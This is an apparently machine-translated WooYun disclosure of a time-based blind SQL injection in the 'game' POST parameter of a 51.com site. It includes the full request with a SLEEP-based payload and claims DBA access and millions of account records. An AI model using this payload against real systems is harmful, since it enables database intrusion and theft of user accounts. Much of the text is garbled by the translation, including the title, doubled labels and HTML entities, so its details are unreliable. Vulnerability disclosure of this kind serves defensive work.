漏洞标题 51.com修复了坏盲/DBA/4000W帐号信息 相关制造商 51.com 漏洞作者 Xyntax 提交时间 2016-05-07 12: 22 公共时间 2016-06-25 15: 20 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 15 漏洞状态 制造商已确认 标签标签 Mysql的 漏洞详细信息 WooYun: 51.com一个站点MySQL盲目 修复不好，同样位置的游戏参数仍然存在注入 Mysql基于时间的盲目 参数:游戏（POST） 输入:和/或基于时间的盲 标题: MySQL＆gt;=5.0.12 AND基于时间的盲（SELECT） 有效载荷: a=generate_order＆amp; game=1 AND（SELECT * FROM（SELECT（SLEEP（5）））SEIL）＆amp; money=500＆amp; server=1＆amp; username=chtrkovh 漏洞证明： 修理计划： 过滤 版权声明：请注明出处xyntax @乌云